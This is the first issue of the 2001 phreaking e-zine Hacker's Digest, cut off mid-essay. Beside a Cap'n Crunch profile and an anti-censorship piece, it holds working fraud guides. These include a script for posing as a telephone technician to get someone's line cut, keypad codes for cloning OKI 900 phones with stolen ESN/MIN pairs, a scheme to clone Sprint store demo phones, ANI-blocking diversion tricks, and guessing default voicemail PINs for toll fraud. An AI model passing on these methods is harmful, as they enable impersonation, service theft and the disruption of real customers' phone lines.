home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / hackersdigest / digest_s_1.txt < prev    next >
Encoding:
Text File  |  2002-05-27  |  120.0 KB  |  2,312 lines

  1.  
  2.  
  3.  
  4. H    A    C    K    E    R    '    S        D    I    G    E    S    T
  5. ----------------------------------------------------------------------
  6.                          www.hackersdigest.com
  7. SUMMER 2001                                                    ISSUE 1
  8.  
  9.  
  10.  
  11.  
  12.                   Da Wutang
  13.  
  14.         =============================================*
  15.     |Hello World 
  16.     ============
  17.      |Hacker's Digest Focus Cap 'n Crunch 
  18.         ====================================
  19.     |The New AT&T Network 
  20.         =====================
  21.         |The Art of the Force Out 
  22.         =========================
  23.         |OKI 900 Reprogramming/Cloning in a Nutshell 
  24.         ============================================ 
  25.     |Exploring Sprint PCS 
  26.         =====================
  27.     |Exploring MTV Telecom 
  28.         ======================
  29.          |International Bookburning in Progress 
  30.         ======================================
  31.     |Digital Multiplexing System 
  32.         ============================ 
  33.         |Cross Site Scripting the Security Gap 
  34.     ======================================
  35.         |Shell/PPP Connectivity over Cellular Networks 
  36.         ==============================================
  37.         |Nortel Millenium Payphones 
  38.         ===========================
  39.         |Writeing Buffer Overflow Exploits 
  40.         ==================================
  41.         |What You Don't Know Will Hurt You 
  42.         =============================================* 
  43.  
  44.  
  45.  
  46.  
  47. +==============================================================================+
  48. | Get The Latest Issues                                                        |
  49. |                            Join the Mailing List                             |
  50. |                            ---------------------                             |
  51. | E-mail hd-request@hackersdigest.com with the word subscribe in the           |
  52. | subject line.                                                                |
  53. +==============================================================================+
  54.  
  55.  
  56.  
  57.  
  58. =========================[     Hello World     ]=========================
  59.  
  60.  
  61.  
  62. Its here, the first issue of HackerÆs Digest, sixty pages of kung fuck 
  63. that you would be stupid not to read. You might be asking yourself just 
  64. what the hell we are trying to do. Our goal is to provide solid 
  65. information to the hacker/phreaker community. Hackers you say? Those punk 
  66. kids who billed $5,000 dollars to my credit card? Fuck no... We are not 
  67. here to defend, support or encourage petty crimes that are done with 
  68. computers. We are about cutting edge technology, how technology works, 
  69. its faults, and how it effects our life. We are about learning and answering 
  70. questions that you canÆt ask anywhere else. 
  71.  
  72. Now that you know what we are about let me explain how we are operate. 
  73. We offer one year subscriptions for $15.00 and a two year subscription for 
  74. $30.00. We also have the magazine online for free. Why do we sell and 
  75. offer the magazine for free? We need the support. HackerÆs Digest operates 
  76. off of a shoe string budget and we need your support to keep us running. 
  77.  
  78. There are other ways to support HackerÆs Digest. We need letters, articles, 
  79. and comments to tell us what you want to see in HackerÆs Digest. Everything 
  80. you send to us will be read, so send it in. The fact is that we need to 
  81. know that you are out there and we are going to keep putting issues out 
  82. and paying the bills as long as we know people are out there giving a damn 
  83. about what we are doing. 
  84.  
  85. So how important is it to have a magazine that supports freedom of speech? 
  86. With new laws being passed such as the Digital Millennium Copy Write Act, 
  87. cameras in the streets scanning everyone's face to a database that is made 
  88. up of data that gets populated from the DMV. More worms being released into 
  89. the wild, feeding the fire about "Cyber Terrorism" You tell me. 
  90.  
  91. You will not see banners or paid advertisements of any sort on our web site 
  92. or in our magazine. We are not about making money. We are about providing 
  93. to the hacking/phreaking community that has provided so much to us. To 
  94. educate our peers who have educated us. 
  95.  
  96. You will notice that this issue does not have any letters in it. Well its 
  97. our first issue so what do you expect. In the future we will offer ten pages 
  98. of letters so send them in. There is little chance it will not get printed.
  99. We are also excepting any type of art you could send in. Drawings, logos, 
  100. and covers. As well as ideas for any covers you might have. Anything will 
  101. help. 
  102.  
  103. We could have not gotten this together in time without support from alot 
  104. of friends. Special thanks to PPC (www.ppchq.org) and Phone Geeks 
  105. (www.phonegeeks.com). All of our writers and everyone who helped to make 
  106. this happen.
  107.  
  108.  
  109.  
  110. ===========[     Hacker's Digest Focus Cap 'n Crunch     ]===============
  111.  
  112.  
  113.  
  114. Who is Cap æn Crunch 
  115.  
  116. Cap æn Crunch has to be one of the most well known phone phreaks to go down 
  117. in history. You may have came across his name in a text file or heard him 
  118. speak at H2K in the Old Timers panel. According to Cap æn Crunch his first 
  119. adventure into phone phreaking came when he received a call from a blind kid
  120. who had heard him on the radio from a home made transmitter. He asked the 
  121. kid for his phone number and he called him back, to his surprise it was a 
  122. loop. 
  123.  
  124. He visited the blind kid at his house and he wanted to know if Cap æn Crunch 
  125. could build him a MFÆer which is a box that plays 6 tones, 700, 900, 1100, 
  126. 1300, 1500, and 1700 Hz. This is widely known as a blue box. The kid called 
  127. a 800 number and then seized a trunk with his organ.
  128.  
  129. Calling a conference line that could only be accessed if you owned a blue box
  130. Cap æn Crunch would talk hours on end about the phone system with other phone 
  131. phreaks. If they found a problem in the phone system such as a sick trunk they 
  132. would call the phone company and report the problem. They would get responses 
  133. such as "WeÆve been trying to trace down that stuck tandem for months, how did 
  134. you find it?". They even had the phone company thinking they worked for them. 
  135.  
  136. Cap æn CrunchÆs Arrest 
  137.  
  138. In 1971 there was a article in the San Jose Mercury about a guy selling blue 
  139. boxes to members of organized crime. The phone company then tapped the 
  140. conference line and soon the guy was arrested. To get back at the phone company 
  141. he got in touch with Ron Rosenbaum who wrote the article "The Secret of the 
  142. little blue box" that is easily to find this day on the internet. Ron Rosenbaum 
  143. got in touch with the blind kid for interviews. With out knowing that Cap æn 
  144. Crunch did not want to have anything to do with Ron Rosenbaum the blind kid 
  145. told him everything. Cap æn Crunch ran to a news stand and was shocked at all 
  146. the errors in the article. He just knew the FBI was going to come for him so 
  147. he completely stopped everything.
  148.  
  149. In 1972 Cap æn Crunch stopped at a 7-11, as soon as he got out of his car he 
  150. was jumped by 4 men who threw him against the car, handcuffed him and read 
  151. him his rights. 
  152.  
  153. Serving Time 
  154.  
  155. Cap æn Crunch served his time at Lompoc minimum security prison. He bought a 
  156. radio and modified it to pick up the prison guards walkie talkieÆs. He would 
  157. have a friend wait for him on a loop and would three way other people from 
  158. there. In jail he showed other inmates how to build cheese boxes. He said it 
  159. was a challenge to teach people who could hardly read or write how to build 
  160. things such as laser bug detectors etc... Cap æn Crunch volunteered to work 
  161. in the pig stables. He said that since he grew up on a farm and really liked 
  162. animals he did not mind the labor. By teaching other inmates, it was a way to 
  163. keep his mind occupied and make time go a little faster. It also helped his 
  164. popularity and kept him from having to do the shittiest jobs.
  165.  
  166. Cap æn Crunch and Apple
  167.  
  168. If you decide to visit Cap æn Crunches web site you will see his support for
  169. apple for being a secure operating system, but his roots with apple go further
  170. then that. After the article "The Secret of the little blue box" came out, Steve
  171. Wozniak, co founder of Apple Computers wanted to contact him. Steve Wozniak
  172. contacted Cap æn Crunch and it was not long before he talked him into visiting
  173. UC Berkeley. When he went to Steve WozniakÆs dorm, he also found Steve Jobs and
  174. Bill Klaxton waiting for him. He explained how to use it and better what not to
  175. do with it. He told Steve Wozniak not to sell blue boxes but he did not listen
  176. and made enough money to pay for school and finance the Apple I project.
  177.  
  178. Cap æn CrunchÆs Second Arrest
  179.  
  180. Yes, Cap æn Crunch was arrested a second time. He was friends with great social
  181. engineering artist named Adam. Adam contacted Cap æn Crunch and talked him into
  182. visiting him. He had broken into COSMOS. This was the phone companyÆs computer
  183. system and had the power to do anything. Adam visited him a few more times.  Cap
  184. æn Crunch would take him to PotLuck dinn- ers hosted by peopleÆs Computer
  185. Company. When he was at a food market Adam had flagged him down to a pay phone
  186. and put it in his face to talk to a friend not knowing how the call was paid. 
  187. In 1974 Cap æn Crunch was arrested again. Come to find out, Adam had sold him
  188. out to the FBI and had a pay phone tapped so it was like he blue boxed the call.
  189. He also found out that Adam got a few other people busted that would not have
  190. got back into blue boxing if Adam did not contact them.
  191.  
  192. Pranking the President
  193.  
  194. Cap æn Crunch found a way to listen to on going conversations the same way the
  195. operator can break into a call if its a emergency y. Cap æn Crunch was scanning
  196. the 202 area code which was for the Washington area. They found the CIA Crisis
  197. hot line. They tapped the number and heard people talking they were sure was
  198. CIA.  They soon found the code word that would connect them to the president.
  199. They called up and heard someone say "9337" Cap æn Crunch's friend said "Olympus
  200. please!", the man at the other end said "One moment sir!" sure enough a man that
  201. sounded alot like Nixon said "WhatÆs going on?". his friend said "We have a
  202. crisis here in Los Angeles!", Nixon said "WhatÆs the nature of the crisis?", his
  203. friend said in a serious tone of voice "WeÆre out of toilet paper sir!". Nixon
  204. said "WHO IS THIS?" his friend hung up. No one knows what happened to the tapes.
  205.  
  206. Cap æn Crunch Now
  207.  
  208. Cap æn Crunch is currently working on his own business, web hosting and his new
  209. firewall Intrusion Detection System called the "Crunch Box" that is built on
  210. OpenBSD.  His web hosting service has to be the most secure servers I have ever
  211. seen. His whole network is running Mac OS and we all know how many security
  212. holes there are for the Mac.
  213.  
  214. I asked him what he thought about phone phreaking groups such as Phone Losers of
  215. America and he thought they were great. He also said they contacted him and
  216. asked if he would link to there site. He checked it out and thought they were
  217. worth the link. I also asked him, if given the chance would he do it all again.
  218. He told me without a doubt.
  219.  
  220. Cap æn Crunch honestly had to be one of the nicest phone phreaks I have ever
  221. met.  Its clear that all the hype his name has is well deserved and has not even
  222. gone remotely close to his head and if you have a chance to email him I would. 
  223. He has to be the most interesting person I have ever met.
  224.  
  225. http://www.webcrunchers.com
  226.  
  227.  
  228.  
  229. =====================[    The New AT&T Network     ]=====================
  230. =====================[        by Lucky225          ]=====================
  231.  
  232.  
  233. It seems that AT&T was not to fond of my ANI Spoofing article that appeared in
  234. 2600 (17:4) Just a few days after I picked up a copy of the new 2600 and saw
  235. that my article had been printed, I started noticing a lot of changes in the
  236. AT&T network. First they shut off their 800 ANAC, a few days later calls that
  237. were routed to 800-673-7286 by the Verizon Long Distance operator were handled
  238. strangely. I began noticing that if I made a call through the Verizon Long
  239. Distance operator to 800-673-7286, I could place calls to 800 numbers NOT on the
  240. AT&T network, but that the ANI was being sent as '615-986-9873' or ANI II Pair
  241. 23 followed by areacode 904. Thus, calls placed through the Verizon Long
  242. Distance operator to AT&T's 800-operator could not be used to spoof ANI any
  243. more. The 615 number belongs to a PBX owned by AT&T in Nashville, TN. I could
  244. still spoof ANI on the AT&T network if I diverted through my local operator or
  245. various other 101XXX long distance carrier operators, but this April it stopped
  246. working. I soon figured out what was happening. AT&T has centers all around the
  247. country including Alaska and Hawaii.  The way SS7 works, depending on where your
  248. calling from, an 800 number can be routed to various other places. For example
  249. their could be a nationwide 800 number that alows you to call from any where in
  250. the country, but say a person that calls the same 800 number from Florida could
  251. get routed to that business's office on the east coast, and a person that calls
  252. from California may get routed to the west coast office. That's what it's like
  253. when you call 800-673-7286, you get routed to the nearest AT&T center near you
  254. to take the call. So when I was making a call through the Verizon Long Distance
  255. operator to 800 673 7286 I would get routed to the Florida AT&T center because
  256. the Verizon Long Distance operator I got was based out of Florida(813), which is
  257. why when I had the AT&T operator dial an ANAC it would show 23-904(Florida).
  258. However, not all Verizon Long Distance operators are based in Florida, some of
  259. them are based out of Kentucky(606) which for whatever reason will get you the
  260. Nashville, TN Center. The Nashville Center is the only center I have seen so far
  261. that transmits ANI with ANI II Pair "00" and a full 10 digit phone
  262. number(615-986-9873)
  263.  
  264. The AT&T Centers: As I mentioned, there are various AT&T centers throughout the
  265. country, and they are also the centers that handle the automated AT&T Long
  266. Distance operator services as well as 800-call-att and 800-operator. With the
  267. new upgrade that AT&T is implementing (wide spread across the country I preditct
  268. by now) each center is geting a total make over, there will be no more ANI
  269. spoofing to AT&T numbers, they are updating these centers so that you can call
  270. any 800 number through the AT&T carrier. Calls to 800 673 7286 that have an ANI
  271. fail will no longer use the phone number you give as ANI when calling other toll
  272. free numbers. Instead, ANI II pair 23 and the areacode of the AT&T center will
  273. be used. However, the best part is that you can place calls to toll free numbers
  274. without speaking to an operator. Simply dial 10-10-ATT-0(10-10-288-0) and enter
  275. the toll free number you want to call. The ANI will show up as ANI II pair 23
  276. and the areacode of the AT&T Center, op diverting without even having to speak
  277. to the op! However you will notice that if you try to dial 800-call-att or
  278. 800-673-7286 it will apear that your ANI still shows up, this is because these
  279. numbers are handled by the same AT&T center. However any toll-free number not
  280. handled by the AT&T center(basically any toll-free number that's not used for
  281. AT&T operator services) will be processed with your ANI not being transmited. 
  282. There are a few advantages and disadvantages of this new system. The only real
  283. disadvantage is that you can not spoof ANI any more. The advantages however are
  284. that you can place calls to basically any toll free number you wish without your
  285. ANI being passed simply by dialing 10-10-ATT-0 and then pressing in the toll
  286. free number you want to call at the AT&T prompt. You can even use this at
  287. payphones to call toll free numbers that don't allow payphone calls or to get
  288. around payphone surcharges. Op diverting used to be so hard, local ops not
  289. wanting to help you out, and 101XXX carrier ops only being able to be reached
  290. from certain parts of the country, and the real downside being that you had to
  291. talk to an operator, that by the way might listen in to your call, when trying
  292. to divert to toll free numbers, but now thanks to AT&T's new network that you
  293. can reach anywhere in the country by simply dialing 10-10-288-0 or even just 00
  294. if you have AT&T, and you dont even have to talk to an operator you just punch
  295. in the toll free number you want to call on your touch tone keypad. You can even
  296. divert to that toll-free number using your modem to find out what that carrier
  297. is you always wanted to know is by setting your modem to dial 10-10-288-0,
  298. 1-800-xxx-xxxx, without fear of your ANI showing up. I'm sure AT&T logs your ANI
  299. and probably would take action if you were harassing a toll-free number long
  300. enough, but for now you can think of 10-10-288-0 as your own free ANI blocking
  301. service.
  302.  
  303. Refrence:This is a follow up to an article in 2600 17:4 titled "Confusing ANI
  304. and Other Phone Tricks"
  305.  
  306.  
  307.  
  308. =====================[  The Art of the Force Out   ]=====================
  309. =====================[            by herf          ]=====================
  310.  
  311.  
  312.  
  313. You may have read texts on social engineering cheeseburgers from McDonalds but
  314. that is not what this paper is about. I will go into getting a circuit busied
  315. out using your telco's dumbass repair techs.
  316.  
  317. I'm sure your question has shifted to how? It's actually pretty simple.
  318.  
  319. Ok, I'll go over having a person's line busied out.
  320.  
  321. Before accomplishing this, you'll need to understand what having a circuit
  322. busied out means. When out on a job, field technicians have to get a ciccuit
  323. disconnected for a short period of time before working on the line. Why? 
  324. Because 110 volts of electricity surges through the circuit when phones ring. 
  325. Bascially, if you were holding both tip and ring and the circuit tried to
  326. connect a call, you'd be unpleasently shocked out of your mind. So, to avoid
  327. lawsuits from their field techs, telco tech support enables circuits to be
  328. remotely severed.
  329.  
  330. Now, you'll need to make an identity for yourself. As for myself, I most
  331. commonly refer to myself as Chris Knight and use an employee ID I found in Bell
  332. Atlantic's trash. I have a fake voices I use to connect personally with whatever
  333. repair tech I talk to. If it's a black man or woman, I speak using a black man's
  334. accent with a touch of Southern. If it's a white man or woman, I speak like a
  335. redneck. The reason I do this is to fool the repair tech into thinking I'm
  336. beneath them, into thikning that my intellectual capacity is that of a carrot.
  337. Why? Because if they think their time is more important then mine, they'll
  338. become impatient and do whatever I want them to.
  339.  
  340. The engineering aspects of having someone's circuit busied out are pretty
  341. mindless. Get your telco's field tech support number, for one. Social
  342. engineering it out of the CO is pretty easy. All you have to do is ask to speak
  343. with a supervisor, tell him you're out on a ticket, you're new and the presets
  344. on your set aren't working correctly. If he asks where your reference sheet is,
  345. tell him it's buried underneath your equipment somewhere. If he still resists,
  346. tell him you're already in overtime and you need to get in touch with field tech
  347. support before working on the line. When he hears the term "Overtime" he'll
  348. oblige because he's a nazi.
  349.  
  350. Ok, make sure to op divert to the field tech support toll free number because
  351. you don't want to go to jail. Once connected, enter in whatever menu number it
  352. is to speak with a repair technician. When the repair tech gives the cute little
  353. welcome schpiel, ask their name again to show you care. When you speak, make
  354. sure you sound like a disgruntled employee to relate with them. Announce your
  355. name and ID number. If you don't have one, they're usually 3 digits. Just make
  356. one up. If they say it's not listed, tell them you just got out of training.
  357. Anyway, open the conversation like this: "Hey, what's your name again? - Oh, ok.
  358. Well (blank), I'm out on a trouble ticket and I need to get a circuit forced
  359. out." - They'll ask why you haven't called your CO to get it done. That's when
  360. you say, "Well, I tried calling my CO but the line has been busy for 30 minutes.
  361. Same with the WMC. I'm already on overtime and my foremer(foreman) doesn't like
  362. that so I took desperate measures. Can you help me out or transfer me to someone
  363. who can, please?"
  364.  
  365. When they say yes, you're in. It's only a matter of sounding authenticate. If
  366. you can't sound authenticate, you probably shouldn't be doing this anyway.
  367.  
  368. Ok, so now you know and knowing is the first step to serious jail time.
  369.  
  370. Oh, below, I'll list some acronyms that might help to authenticate yourself.
  371.  
  372. WMC - Work Maintenence Center (Verizon+) WAC - Work Assessment Center
  373. (Bellsouth- Appended by khecka) NOC - Network Operations Center IR - Tech ID
  374. Trouble Ticket - Issued to field technicians to identify different jobs. 
  375. Former(Foreman) - Boss SISSYTECH - Slang for a technician who only does house
  376. repair..  Force Out - Busy Out
  377.  
  378. Peace and Fleece. One step closer to having your sheep ID revoked.
  379.  
  380.  
  381.  
  382. ==============[OKI 900 Reprogramming/Cloning in a Nutshell]==============
  383. ==============[             by dark_fairytale             ]==============
  384.  
  385.  
  386.  
  387. Ok, so you've read the Oki 900 Guide by Iceberg and you still don't fully
  388. understand how to reprogram/clone your Oki 900. Well now i'm going to explain in
  389. the simplest terms possible on just how to do just that for those of you that
  390. still don't understand.
  391.  
  392. Materials Needed:
  393.  
  394. Oki 900 with 4712 Chip Modification A Valid Esn and Nam Pair (ESN should already
  395. be in hex)
  396.  
  397. Ok, now if you don't know what a Esn and Nam pair is then you shouldn't be
  398. reading this. However, if you do, continue on. The very first thing you'll need
  399. to do is to put your Oki 900 into test mode/debug mode by doing the following:
  400. Power up the phone. Hold down the 7 and 9 buttons for about a second, release.
  401. Quickly enter Menu, Snd, End, Rcl, Sto, Clr. The phone should now read Good
  402. timing!!! If not, start over. If all goes well up until here hit 1 and 3 buttons
  403. at the same time and it will clear the Good timing from the display. Ok, now
  404. you're ready to program in your ESN. You have 5 locations for ESN is you are
  405. using the 4712 chip mod and you will have to program in each byte of ESN
  406. separately in it's separate location in order for it to work. To begin
  407. programming the ESN into the phone: hit #54 followed by the 4 digit location
  408. followed by the byte of ESN then Snd
  409.  
  410. Every ESN location is as follows:
  411.  
  412. -Esn 1 Locale- BE8E BE8F BE90 BE91
  413.  
  414. -Esn 2 Locale- BE93 BE94 BE95 BE96
  415.  
  416. -Esn 3 Locale- BE98 BE99 BE9A BE9B
  417.  
  418. -Esn 4 Locale- BE9D BE9E BE9F BEA0
  419.  
  420. -Esn 5 Locale- BEA2 BEA3 BEA4 BEA5
  421.  
  422. Now you may be looking at this and still wondering, what the fuck? Ok, let me
  423. explain more clearly here. An ESN is an 8 digit/letter number combination when
  424. properly put into hex mode which will be needed when reprogramming the ESN. When
  425. reprogramming the ESN you will enter it two digits/letters at time into the Oki.
  426. For example, let's say your ESN is: BD94-A623 and you want to program that into
  427. ESN Slot 1. Therefore you would program: BD into location BE8E, 94 into BE8F,
  428. and so on.... Ok, I hope that helps a little for you beginners. When
  429. reprogramming your ESN more than likely you will have to program in a letter. To
  430. get letters all you simply need to do is hit the * key on the phone before
  431. hitting the corresponding number. Here is a key for that as well:
  432.  
  433. STAR KEY A=*1 B=*2 C=*3 D=*4 E=*5 F=*6
  434.  
  435. On last quick note on reprogramming the ESN, hit # before each entry and send to
  436. save it before you move on. Ok,now after you get the full ESN programmed in you
  437. will have to reboot the phone. So simply turn the phone off for a second or two
  438. and turn it back on. Now comes reprogramming the NAM. As soon as you power up
  439. the phone you will have to: Hold Rcl and Mnu at the same time for a second or
  440. two, release. Quickly followed by *,6,2,7,2,9,8,5,4,#. If entered correctly some
  441. numbers will pop up on the display followed by the words Dealer which means just
  442. that, you are in Dealer mode and your NAM is ready to be reprogrammed. Ok, now
  443. use the volume button on the side to scroll down to the corresponding NAM to the
  444. ESN you just programmed in.  Let the display sit there for a second and the
  445. prompt will then come up Own #. Now re-enter the NAM that you have for your ESN
  446. and hit STO. With that being done hit the Down Volume button three times and you
  447. should see a prompt that reads ACCOLC #. Here you need to enter 0 followed by
  448. the last digit of the NAM you are programming in and hit STO once more. Once
  449. that is done shut the phone off once more to reboot and power it back on. Now
  450. you are ready to select your NAM and ESN from the Admin Menu to put it to use.
  451. When the phone powers back up hit Menu 8 times for the Admin Menu to appear. Hit
  452. recall to access it and enter your security code. The default password on most
  453. phones is 123456, but please note that it can be changed. Once into the Admin
  454. menu hit RCL to choose the NAM you want to use and hit STO and the prompt should
  455. appear: RESET TIMER. Turn the phone off and turn it back on and you're almost
  456. done. Now getting the ESN and NAM to work properly may take some experimenting
  457. with the carrier selection which varies from A to B. Most A side carriers are
  458. hard to clone do to rf fingerprinting. To access the carrier selection again hit
  459. Menu 8 times and go into the Admin menu. Enter your password and hit the Down
  460. volume arrow button until you see the System Prefer followed by whichever
  461. carrier is selected. Hit STO to select. Try your pair with A, if that doesn't
  462. work simply go back and Try with B. If that doesn't work, than you have a bad
  463. pair and should go out and get another. Ok, I hope this text file has helped
  464. those who have had trouble understanding the concept of reprogramming/cloning
  465. the OKI 900 with 4712 MOD and if it hasn't then i strongly suggest you find a
  466. new hobby. Thanks for reading.
  467.  
  468. References: The Complete Oki 900 Guide by Iceberg.
  469.  
  470. Shouts:  PPC UP$ P.O.T.S.  Plexus Liquid Illusion Comic_1 DrDaedlus Redxer
  471. HateServ
  472.  
  473. the list goes on and on......
  474.  
  475.  
  476. =====================[     Exploring Sprint PCS    ]=====================
  477. =====================[           by Okiwan         ]=====================
  478.  
  479.  
  480.  
  481. Introduction Here's a sweet exploit I came up with while waiting in line at the
  482. Sprint PCS store. First a little back story, Sprint PCS is a digital CDMA
  483. network making it virtually impossible to clone...or so we thought. The weakness
  484. of Sprint's network is that there digital coverage is pathetic. To fill up the
  485. HUGE holes in their network, Sprint has roaming agreements throughout the US.
  486. The roaming agreement is that whenever there isn't a digital signal (1900) the
  487. phones will drop to analog (800) which is what Sprint calls "roaming".
  488.  
  489. THE EXPLOIT Every Sprint PCS store has a sales floor where they have activated
  490. phones that you can pick up and use. Sprintstores do that so you can try out
  491. their phones to hear the sound quality of each different phone before you buy
  492. one or to call home(or anyone) as a courtesy call. In fact, every time I go to a
  493. Sprint store I always make at least 15-20 prank calls all over the US.
  494.  
  495. Basically all you need to do is:  1)Go through the menu and look for the phone's
  496. telephone number which is your MIN (mobile id number) 2)Look at the back of the
  497. phone and find an 8 character number/letter sequence and this is your ESN.
  498. 3)Program the ESN and MIN into your analog OKI-900 phone.
  499.  
  500. Guess what you just cloned the Sprint PCS's courtesy phone. So when you use your
  501. cloned OKI-900 phone, Sprint PCS will think your roaming since your using an
  502. analog only phone.
  503.  
  504. These phones are activated using unlimited calling minutes and I doubt that the
  505. Sprint PCS store looks though the hundreds off phones calls that are made from
  506. these phones each month so there's little to no chance of getting caught. 
  507. There's like 7-8 different models out right now so you should get all 7-8
  508. accounts and use'em like crazy.
  509.  
  510.  
  511. =====================[   Exploring MTV Telecom     ]=====================
  512. =====================[     by dark_fairytale       ]=====================
  513.  
  514.  
  515.  
  516. MTV. You all know the name. You've all probably watched it at one time or
  517. another. Who hasn't? One day this past spring , I happened to be watching MTV.
  518. In fact it was an episode of Total Request Live. If you haven't seen this (which
  519. most of you probably have) show, I'll cover the premise briefly.  Carson Daly
  520. hosts this live daily show from MTV Studios in New York, NY, which basically
  521. caters to the teeny bopper fad of boy bands and Britney Spears.  Every once in a
  522. brief while you might actually see a real band in a video, but very rarely. Go
  523. figure. Anyways, I'm sitting there watching this show, TRL, when they say
  524. they're gonna have a contest. WOWIE! A contest that will go something like this:
  525. In every top 10 video there will be a hint/clue/question asked and the answer is
  526. a number. When all the numbers are revealed, you will have the phone number for
  527. the TRL Studio Phone which is no more than ten feet away from Carson Daly's fat
  528. head.
  529.  
  530. Now normally, I wouldn't be impressed with their cheesy contests, but this one
  531. somehow piqued my interest. Imagine having the number to that phone to disrupt
  532. their live show day after day to constantly harass Carson Daly. Oh what fun that
  533. would be! Eh! I had to have this number. So I raced for a pen and paper and sat
  534. through the whole damn show jotting down number after number.  But, before the
  535. show had ended, I had remembered someone mentioning to me before that MTV/Viacom
  536. had it's very own exchange in New York. Why would such a company have it's very
  537. own exchange, is beyond my comprehension, but tis true.  The Viacom exchange is
  538. 212 846. I had these first six numbers, because I already had a number within
  539. MTV studios that i knew was legit.
  540.  
  541. So on with the contest with my cheating going on already. Well turns out, MTV
  542. decided to give everyone a chance to win the contest earlier than expected by
  543. having the number 2 video question be, "how many times is rollin said in the
  544. following video Limp Bizkit's Rollin?" equal out to the last 2 digits of the
  545. phone number. Up to this point, I had all the numbers correct. But somehow the
  546. light gleaming off of Fred Durst's bald head threw me off and I got confused and
  547. blew that. Foiled again! After someone rang the phone next to Carson Daly, they
  548. scrolled the number by on the screen for the phone and I quickly jotted it down.
  549. I raced for the phone to give Carson Daly a call.
  550.  
  551. I quickly dialed 212 846 5581. The phone rings a couple times and a woman
  552. answers. S o I say, "Hello." She says, "Who is this?" so i reply with, "Uhhhhh,
  553. who is this??" She then proceeds to yell at me and say, "THEY MESSED UP! QUIT
  554. CALLING! THEY GAVE OUT THE WRONG NUMBER ON THE AIR!" and slams the phone down.
  555.  
  556. What? MTV messed up and gave out one of their MTV employees phone numbers
  557. instead?  Apparently so, since I obviously wasn't the first confused person this
  558. woman had talked to and she was obviously ticked off about the whole ordeal, but
  559. someone had rang the MTV phone to claim their prize. So was it just a mix up on
  560. the winner's behalf? Was the whole contest rigged? I'm still not sure to tell
  561. you the truth, and I don't really care, but this is what started my mission.
  562.  
  563. My mission really had no climax or finality to it. I was just determined to come
  564. up with some interesting phone numbers in the MTV/Viacom system by demon dialing
  565. the exchange. I also made it a real point to come up with that "secret" MTV TRL
  566. phone number so i could talk to Carson during the show.
  567.  
  568. Anyways after hours of dialing and dialing I finally realized that MTV had a ton
  569. of people working for them I never heard of. Useless people that probably no one
  570. in the world had even heard of to tell you the truth. I also discovered that MTV
  571. uses a Nortel Meridian system for it's telephony needs. We all know just how fun
  572. these can be to play with. If you don't know what I'm talking about, let me
  573. explain. Nortel manufactures these wonderous devices which are installed with
  574. default, usually 4 number, pins. What that means is the pin for a 4 digit
  575. mailbox will match the login if it isn't changed by the owner. You can usually
  576. crack into these babies within ten minutes using random guessing at numbers and
  577. a little common sense. Did I also fail to mention that some Meridians are
  578. equipped with outdialing features? I think you know what I'm getting at. One
  579. could easily rack of tons of toll fraud on MTV's behalf if they really wanted to
  580. and with what i'm sure is a multi-million dollar network, they would probably
  581. never even notice.
  582.  
  583. Anyways, back to the story. I'm dialing around and dialing around when I finally
  584. realize this is completely useless. The chances of me finding anyone famous'
  585. number is a long shot at the rate I'm going. So what do I do? I give up.
  586.  
  587. What does it matter? I already have Serena Altschul's MTV number and it's not
  588. that hard to run across on the internet if you know the right people. I've
  589. talked to her on a couple occassions and may I say, she is not the most
  590. courteous person on the telephone. Serena, if you're reading this, I don't like
  591. you. Just thought I would say that.
  592.  
  593. So what I have learned here? I've learned that MTV does in fact have their own
  594. exchange in New York, to reasons unknown to me. MTV's telephone network operates
  595. off a Nortel Meridian System. MTV pays a lot of useless people to sit around all
  596. day, and I have a few interesting numbers. So I have this text file now of names
  597. and numbers at MTV Viacom and I've narrowed the numbers down to what I think may
  598. be the TRL phone. My guess is: 212 846 5781, (which usually rings and rings. Did
  599. they turn the ringer off? Rats, foiled again.)but I'm pretty sure they could
  600. change the thing if they really wanted which is a total letdown nonetheless.
  601. Failure, curiosity, and sore fingers. It's all in days' work for this common
  602. phreak.
  603.  
  604.  
  605. =================[INTERNATIONAL BOOKBURNING IN PROGRESS]==================
  606. =================[       by Cult of the Dead Cow       ]==================
  607.  
  608.  
  609.  
  610. Free speech is under siege at the margins of the Internet. Quite a few countries
  611. are censoring access to the Web through DNS [Domain Name Service] filtering.
  612. This is a process whereby politically incorrect information is blocked by domain
  613. address -- the name that appears before the dot com suffix.  Others employ
  614. filtering which denies politically or socially challenging subject matter based
  615. on its content.
  616.  
  617. Hacktivismo and the CULT OF THE DEAD COW have decided that enough is too much. 
  618. We are hackers and free speech advocates, and we are developing technologies to
  619. challenge state-sponsored censorship of the Internet.
  620.  
  621. Most countries use intimidation and filtering of one, kind or another including
  622. the Peoples Republic of China, Cuba, and many Islamic countries. Most claim to
  623. be blocking pornographic content. But the real reason is to prevent challenging
  624. content from spreading through repressive regimes. This includes information
  625. ranging from political opinion, "foreign" news, women's issues, academic and
  626. scholarly works, religious information, information regarding ethnic groups in
  627. disfavor, news of human rights abuses, documents which present drugs in a
  628. positive light, and gay and lesbian content, among others.
  629.  
  630. The capriciousness of state-sanctioned censorship is wide-ranging. [1]
  631.  
  632. * In Zambia, the government has attempted to censor information revealing their
  633. plans for constitutional referendums.
  634.  
  635. * In Mauritania -- as in most countries --, owners of cybercafes are required to
  636. supply government intelligence agents with copies of e-mail sent or received at
  637. their establishments.
  638.  
  639. * Even less draconian governments, like Malaysia, have threatened web-publishers
  640. for violating their publishing licenses by publishing frequent updates: _timely,
  641. relevant_ information is seen as a threat.
  642.  
  643. * South Korean's national security law forbids South Koreans from having any
  644. contact -- including contact over the Internet -- with their North Korean
  645. neighbors.
  646.  
  647. * Sri Lanka threatened news sites with possible revocation of their licenses if
  648. coverage of a presidential election campaign was not partial to the party of the
  649. outgoing president.
  650.  
  651. The risks of accessing or disseminating information are often great.
  652.  
  653. * In Ukraine, a decapitated body found near the village of Tarachtcha is
  654. believed to be that of Georgiy Gongadze, founder and editor of an on-line
  655. newspaper critical of the authorities.
  656.  
  657. * In August, 1998, eighteen year old Turk Emre Ersoz was found guilty of
  658. "insulting the national police" in an Internet forum after participating in a
  659. demonstration that was violently suppressed by the police. His ISP provided the
  660. authorities with his address.
  661.  
  662. * Journalist Miroslav Filipovic has the dubious distinction of having been the
  663. first Journalist accused of spying because of articles published on the Internet
  664. -- in this case detailing the abuses of certain Yugoslav army units in Kosovo.
  665.  
  666. We are sickened by these egregious violations of information and human rights.
  667. The liberal democracies have talked a far better game than they've played on
  668. access to information. But hackers are not willing to watch the custodians of
